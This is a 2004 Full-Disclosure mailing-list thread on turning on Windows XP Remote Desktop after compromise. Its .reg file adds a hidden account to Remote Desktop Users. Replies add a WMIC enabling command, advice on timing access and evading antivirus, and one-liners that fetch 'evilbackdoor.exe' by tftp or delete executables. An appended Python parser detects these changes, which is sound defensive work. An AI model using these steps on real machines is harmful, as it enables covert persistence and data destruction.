Re: [Full-Disclosure] XP Remote Desktop Remote Activation
Funny you should mention that, I was just wondering last night how to use PEX to turn this into a Metasploit payload... :-) One of these days I've got to sit down and start tinkering with it as there's 2 or 3 payloads I want to add to Metasploit (mostly custom backdoors), but I'm lazy and haven't gotten around to it.

Fixer

On Sun, 3 Oct 2004 00:58:18 -0500, H D Moore <[EMAIL PROTECTED]> wrote:
> If the exploit was written as a module for the Metasploit Framework, just
> select the VNC in-memory DLL injection payload and call it done. This
> payload has the following advantages:
>
> - No files are written to disk, the AV has no chance of catching it
> - The VNC server is a thread in the exploited app's process
> - The payload works in read-only mode if admin privs aren't obtained
> - It will use the WinLogon desktop if locked or nobody is logged in
> - A command prompt is provided with the privs of the exploited process
> - If the exploit causes the app to exit on crash, no traces are left
>
> http://metasploit.com/images/vnc.jpg
> http://metasploit.com/projects/Framework/
>
> -HD
>
> On Friday 01 October 2004 23:50, Fixer wrote:
> >
> > Windows XP Professional provides a service called Remote Desktop,
> > which allows a user to remotely control the desktop as if he or she
> > were in front of the system locally (ala VNC, pcAnywhere, etc.).

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] XP Remote Desktop Remote Activation
If the exploit was written as a module for the Metasploit Framework, just select the VNC in-memory DLL injection payload and call it done. This payload has the following advantages:

- No files are written to disk, the AV has no chance of catching it
- The VNC server is a thread in the exploited app's process
- The payload works in read-only mode if admin privs aren't obtained
- It will use the WinLogon desktop if locked or nobody is logged in
- A command prompt is provided with the privs of the exploited process
- If the exploit causes the app to exit on crash, no traces are left

http://metasploit.com/images/vnc.jpg
http://metasploit.com/projects/Framework/

-HD

On Friday 01 October 2004 23:50, Fixer wrote:
>
> Windows XP Professional provides a service called Remote Desktop,
> which allows a user to remotely control the desktop as if he or she
> were in front of the system locally (ala VNC, pcAnywhere, etc.).
Re: [Full-Disclosure] XP Remote Desktop Remote Activation
That I can't say as I actually developed this several months ago and just now released it because of SP2, which makes it a bit harder to pull this off. You're absolutely right that when you remotely access the machine it locks out the user. The upside (or maybe downside) is that a lot of home users still leave their machines on all night so that's not a big deal, just use NET TIME to check the local time and run RD when they aren't likely to be on. Worst case is that you'll get booted when they reset the machine :-(

Fixer

On Sat, 2 Oct 2004 12:56:24 -0500, RandallM <[EMAIL PROTECTED]> wrote:
> Would access to command shell be accomplished via the recent ZoneID hole if
> such Administration password access is not available? Or perhaps even with
> the launching of the MS04-028 exploit? Of course any Terminal usage on home
> pc's are noticed because users are locked out. Now terminal servers are a
> different story but user intervention is still needed.
>
> thank you
> Randall M
>
> <|>Message: 3
> <|>Date: Fri, 1 Oct 2004 23:50:45 -0500
> <|>From: Fixer <[EMAIL PROTECTED]>
> <|>Reply-To: Fixer <[EMAIL PROTECTED]>
> <|>To: [EMAIL PROTECTED]
> <|>Subject: [Full-Disclosure] XP Remote Desktop Remote Activation
> <|>
> <|>XP Remote Desktop Remote Activation
> <|>
> <|>Information
> <|>
> <|>Windows XP Professional provides a service called Remote Desktop,
> <|>which allows a user to remotely control the desktop as if he or she
> <|>were in front of the system locally (ala VNC, pcAnywhere, etc.).
> <|>
> <|>By default, Remote Desktop is shipped with this service turned off and
> <|>only the Administrator is allowed access to this service. It is
> <|>possible, however, to modify a series of registry keys that may allow
> <|>a malicious user who has already gained a command shell to activate
> <|>Remote Desktop and add a user they have created for themselves as well
> <|>as to hide that user so that it will not show up as a user in the
> <|>Remote Desktop user list. The instructions for this are attached.
> <|>Additionally, I have listed a sample .reg file of the type that is
> <|>discussed in the instructions below.
> <|>_____________________________
> <|>
> <|>Message: 6
> <|>From: "Dominick Baier" <[EMAIL PROTECTED]>
> <|>To: "'Fixer'" <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
> <|>Subject: RE: [Full-Disclosure] XP Remote Desktop Remote Activation
> <|>Date: Sat, 2 Oct 2004 17:43:11 +0200
> <|>
> <|>if you have an administrator password for the machine you can just use WMIC
> <|>to turn remote desktop on.
> <|>
> <|>wmic /NODE:Server /USER:administrator RDTOGGLE WHERE ServerName="Server"
> <|>CALL SetAllowTSConnections 1
> <|>
> <|>End of Full-Disclosure Digest
Re: [Full-Disclosure] XP Remote Desktop Remote Activation
Agreed, but you'll note that this will only turn it on for Administrator, not for the user that you've created. At the point where you've gotten a remote shell (call it via lsass, dameware, or whatever) you're sitting there in the SYSTEM context. You've still got to create the account and give it rights to RD. Doing it that way is only half the battle. You could use VNC, but this way leaves less of a footprint since you're using the built-in MS utils.

Fixer

On Sat, 2 Oct 2004 17:43:11 +0200, Dominick Baier <[EMAIL PROTECTED]> wrote:
> if you have an administrator password for the machine you can just use WMIC
> to turn remote desktop on.
>
> wmic /NODE:Server /USER:administrator RDTOGGLE WHERE ServerName="Server"
> CALL SetAllowTSConnections 1
>
> dominick
> www.leastprivilege.com
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Fixer
> Sent: Saturday, 2 October 2004 06:51
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] XP Remote Desktop Remote Activation
>
> XP Remote Desktop Remote Activation
>
> Information
>
> Windows XP Professional provides a service called Remote Desktop, which
> allows a user to remotely control the desktop as if he or she were in front
> of the system locally (ala VNC, pcAnywhere, etc.).
>
> By default, Remote Desktop is shipped with this service turned off and only
> the Administrator is allowed access to this service. It is possible,
> however, to modify a series of registry keys that may allow a malicious user
> who has already gained a command shell to activate Remote Desktop and add a
> user they have created for themselves as well as to hide that user so that
> it will not show up as a user in the Remote Desktop user list. The
> instructions for this are attached.
> Additionally, I have listed a sample .reg file of the type that is discussed
> in the instructions below.
> _
>
> Final Stuff
>
> To the Frozen Chozen...On-On (www.frozen-chozen-h3.org)
>
> On to the exploit
>
> Fixer
>
> _
>
> .reg file (remember, the xx xx are the values you need to change)
>
> Windows Registry Editor Version 5.00
>
> [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\022B]
> "C"=hex:2b,02,00,00,00,00,00,00,b0,00,00,00,02,00,01,00,b0,00,00,00,28,00,00,\
> 00,00,00,00,00,d8,00,00,00,7a,00,00,00,00,00,00,00,54,01,00,00,1c,00,00,00,\
> 01,00,00,00,01,00,14,80,90,00,00,00,a0,00,00,00,14,00,00,00,44,00,00,00,02,\
> 00,30,00,02,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\
> 00,00,02,c0,14,00,ff,ff,1f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,00,4c,\
> 00,03,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,01,00,00,00,00,\
> 00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,\
> 00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,01,02,\
> 00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,05,20,00,00,\
> 00,20,02,00,00,52,00,65,00,6d,00,6f,00,74,00,65,00,20,00,44,00,65,00,73,00,\
> 6b,00,74,00,6f,00,70,00,20,00,55,00,73,00,65,00,72,00,73,00,4d,00,65,00,6d,\
> 00,62,00,65,00,72,00,73,00,20,00,69,00,6e,00,20,00,74,00,68,00,69,00,73,00,\
> 20,00,67,00,72,00,6f,00,75,00,70,00,20,00,61,00,72,00,65,00,20,00,67,00,72,\
> 00,61,00,6e,00,74,00,65,00,64,00,20,00,74,00,68,00,65,00,20,00,72,00,69,00,\
> 67,00,68,00,74,00,20,00,74,00,6f,00,20,00,6c,00,6f,00,67,00,6f,00,6e,00,20,\
> 00,72,00,65,00,6d,00,6f,00,74,00,65,00,6c,00,79,00,00,00,01,05,00,00,00,00,\
> 00,05,15,00,00,00,d8,52,bb,80,c4,9d,6f,b9,b9,67,c7,13,xx,xx,00,00
>
> [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
> "fDenyTSConnections"=dword:
>
> [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
> "lus3r"=dword:
>
> (obviously change "lus3r" to the name of the account you created)
RE: [Full-Disclosure] XP Remote Desktop Remote Activation
Would access to command shell be accomplished via the recent ZoneID hole if such Administration password access is not available? Or perhaps even with the launching of the MS04-028 exploit? Of course any Terminal usage on home pc's are noticed because users are locked out. Now terminal servers are a different story but user intervention is still needed.

thank you
Randall M

<|>Message: 3
<|>Date: Fri, 1 Oct 2004 23:50:45 -0500
<|>From: Fixer <[EMAIL PROTECTED]>
<|>Reply-To: Fixer <[EMAIL PROTECTED]>
<|>To: [EMAIL PROTECTED]
<|>Subject: [Full-Disclosure] XP Remote Desktop Remote Activation
<|>
<|>XP Remote Desktop Remote Activation
<|>
<|>Information
<|>
<|>Windows XP Professional provides a service called Remote Desktop,
<|>which allows a user to remotely control the desktop as if he or she
<|>were in front of the system locally (ala VNC, pcAnywhere, etc.).
<|>
<|>By default, Remote Desktop is shipped with this service turned off and
<|>only the Administrator is allowed access to this service. It is
<|>possible, however, to modify a series of registry keys that may allow
<|>a malicious user who has already gained a command shell to activate
<|>Remote Desktop and add a user they have created for themselves as well
<|>as to hide that user so that it will not show up as a user in the
<|>Remote Desktop user list. The instructions for this are attached.
<|>Additionally, I have listed a sample .reg file of the type that is
<|>discussed in the instructions below.
<|>_____________________________
<|>
<|>Message: 6
<|>From: "Dominick Baier" <[EMAIL PROTECTED]>
<|>To: "'Fixer'" <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
<|>Subject: RE: [Full-Disclosure] XP Remote Desktop Remote Activation
<|>Date: Sat, 2 Oct 2004 17:43:11 +0200
<|>
<|>if you have an administrator password for the machine you can just use WMIC
<|>to turn remote desktop on.
<|>
<|>wmic /NODE:Server /USER:administrator RDTOGGLE WHERE ServerName="Server"
<|>CALL SetAllowTSConnections 1
<|>
<|>End of Full-Disclosure Digest
RE: [Full-Disclosure] XP Remote Desktop Remote Activation
>>By default, Remote Desktop is shipped with this service turned off and
>>only the Administrator is allowed access to this service. It is possible,
>>however, to modify a series of registry keys that may allow a malicious
>>user who has already gained a command shell to activate Remote Desktop
>>and ...

Like everyone else is saying, if you already own the desktop why not use the user interface Microsoft helpfully provided for this?

LJS
Re: [Full-Disclosure] XP Remote Desktop Remote Activation
If someone installs a backdoor, that can be detected by AV scanner. If you gain temporary shell, open up the management interface, you'll have full control of the box without anyone becoming the wiser.

Joel R. Helgeson
Director of Networking & Security Services
SymetriQ Corporation

"Give a man fire, and he'll be warm for a day; set a man on fire, and he'll be warm for the rest of his life."

----- Original Message -----
From: "morning_wood" <[EMAIL PROTECTED]>
To: "Fixer" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Sent: Saturday, October 02, 2004 11:05 AM
Subject: Re: [Full-Disclosure] XP Remote Desktop Remote Activation

> a malicious user who has already gained a command shell to activate

umm... you already own the box.

try...

tftp -i yourhost get evilbackdoor.exe ( vnc maybe )

or

c:\del *.exe /s
c:\shutdown -r

I really do not see the SECURITY ISSUE here.

cheers,
m.wood
RE: [Full-Disclosure] XP Remote Desktop Remote Activation
if you have an administrator password for the machine you can just use WMIC to turn remote desktop on.

wmic /NODE:Server /USER:administrator RDTOGGLE WHERE ServerName="Server" CALL SetAllowTSConnections 1

dominick
www.leastprivilege.com

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Fixer
Sent: Saturday, 2 October 2004 06:51
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] XP Remote Desktop Remote Activation

XP Remote Desktop Remote Activation

Information

Windows XP Professional provides a service called Remote Desktop, which allows a user to remotely control the desktop as if he or she were in front of the system locally (ala VNC, pcAnywhere, etc.).

By default, Remote Desktop is shipped with this service turned off and only the Administrator is allowed access to this service. It is possible, however, to modify a series of registry keys that may allow a malicious user who has already gained a command shell to activate Remote Desktop and add a user they have created for themselves as well as to hide that user so that it will not show up as a user in the Remote Desktop user list. The instructions for this are attached.
Additionally, I have listed a sample .reg file of the type that is discussed in the instructions below.
_

Final Stuff

To the Frozen Chozen...On-On (www.frozen-chozen-h3.org)

On to the exploit

Fixer

_

.reg file (remember, the xx xx are the values you need to change)

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\022B]
"C"=hex:2b,02,00,00,00,00,00,00,b0,00,00,00,02,00,01,00,b0,00,00,00,28,00,00,\
00,00,00,00,00,d8,00,00,00,7a,00,00,00,00,00,00,00,54,01,00,00,1c,00,00,00,\
01,00,00,00,01,00,14,80,90,00,00,00,a0,00,00,00,14,00,00,00,44,00,00,00,02,\
00,30,00,02,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\
00,00,02,c0,14,00,ff,ff,1f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,00,4c,\
00,03,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,01,00,00,00,00,\
00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,\
00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,01,02,\
00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,05,20,00,00,\
00,20,02,00,00,52,00,65,00,6d,00,6f,00,74,00,65,00,20,00,44,00,65,00,73,00,\
6b,00,74,00,6f,00,70,00,20,00,55,00,73,00,65,00,72,00,73,00,4d,00,65,00,6d,\
00,62,00,65,00,72,00,73,00,20,00,69,00,6e,00,20,00,74,00,68,00,69,00,73,00,\
20,00,67,00,72,00,6f,00,75,00,70,00,20,00,61,00,72,00,65,00,20,00,67,00,72,\
00,61,00,6e,00,74,00,65,00,64,00,20,00,74,00,68,00,65,00,20,00,72,00,69,00,\
67,00,68,00,74,00,20,00,74,00,6f,00,20,00,6c,00,6f,00,67,00,6f,00,6e,00,20,\
00,72,00,65,00,6d,00,6f,00,74,00,65,00,6c,00,79,00,00,00,01,05,00,00,00,00,\
00,05,15,00,00,00,d8,52,bb,80,c4,9d,6f,b9,b9,67,c7,13,xx,xx,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"lus3r"=dword:

(obviously change "lus3r" to the name of the account you created)
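A defender-side check for the changes this thread describes, added here as an example and not code from any of the posters: a small Python parser for the .reg export format that flags the three indicators (fDenyTSConnections turned off, an account hidden through Winlogon\SpecialAccounts\UserList, and a direct write to SAM alias 0x22B, the built-in Remote Desktop Users group). The sample .reg text inside is constructed for the example; the parser also tolerates the blank dword values and "xx" placeholders of the posted template.

```python
import re
# Paths from the thread, lowercased because registry paths are case-insensitive.
TS_KEY = r"hkey_local_machine\system\currentcontrolset\control\terminal server"
USERLIST_KEY = (r"hkey_local_machine\software\microsoft\windows nt"
                r"\currentversion\winlogon\specialaccounts\userlist")
RDP_USERS_RID = 0x22B  # built-in alias "Remote Desktop Users" (RID 555)

# Constructed sample in the shape of the thread's template, not the posted file.
SAMPLE = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"lus3r"=dword:00000000
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\0000022B]
"C"=hex:2b,02,00,00,\
  00,00,00,00
'''

def hexint(tok):  # hex token -> int; a blank number or an "xx" placeholder (as in the template) -> None
    return int(tok, 16) if re.fullmatch(r"[0-9a-fA-F]+", tok) else None

def parse_reg(text):
    """Parse .reg text into {key_lower: {name_lower: (name, type, value)}}."""
    keys, current, pending = {}, None, ""
    for raw in text.splitlines():
        line, pending = pending + raw.strip(), ""
        if line.endswith("\\"):                  # hex continuation: glue to the next line
            pending = line[:-1]
        elif line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif (m := re.match(r'"([^"]+)"=(.*)$', line)) and current is not None:
            name, val = m.groups()               # header and blank lines never get here
            if val.startswith("dword:"):
                parsed = ("dword", hexint(val[6:].strip()))
            elif val.startswith("hex"):          # also covers typed forms such as hex(7):
                parsed = ("hex", [hexint(t.strip()) for t in val.split(":", 1)[1].split(",") if t.strip()])
            else:
                parsed = ("string", val.strip('"'))
            keys[current][name.lower()] = (name,) + parsed
    return keys

def audit(keys):
    """Return the Remote Desktop activation indicators present in a parsed .reg."""
    findings = []
    if keys.get(TS_KEY, {}).get("fdenytsconnections", ())[1:] == ("dword", 0):
        findings.append("Remote Desktop enabled: fDenyTSConnections=0")
    for name, typ, val in keys.get(USERLIST_KEY, {}).values():
        if typ == "dword" and val == 0:          # 0 hides the account from the Welcome screen
            findings.append(f"account hidden from the logon UI: {name}")
    for key in keys:                             # the .reg writes the SAM alias directly
        m = re.search(r"\\aliases\\([0-9a-f]+)$", key)
        if m and int(m.group(1), 16) == RDP_USERS_RID:
            findings.append("direct SAM write to the Remote Desktop Users alias (RID 555)")
    return findings
```

Run `audit(parse_reg(open(path).read()))` over a `reg export` of the three keys to get the findings list; an empty list means none of the thread's changes are present.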
Re: [Full-Disclosure] XP Remote Desktop Remote Activation
> a malicious user who has already gained a command shell to activate

umm... you already own the box.

try...

tftp -i yourhost get evilbackdoor.exe ( vnc maybe )

or

c:\del *.exe /s
c:\shutdown -r

I really do not see the SECURITY ISSUE here.

cheers,
m.wood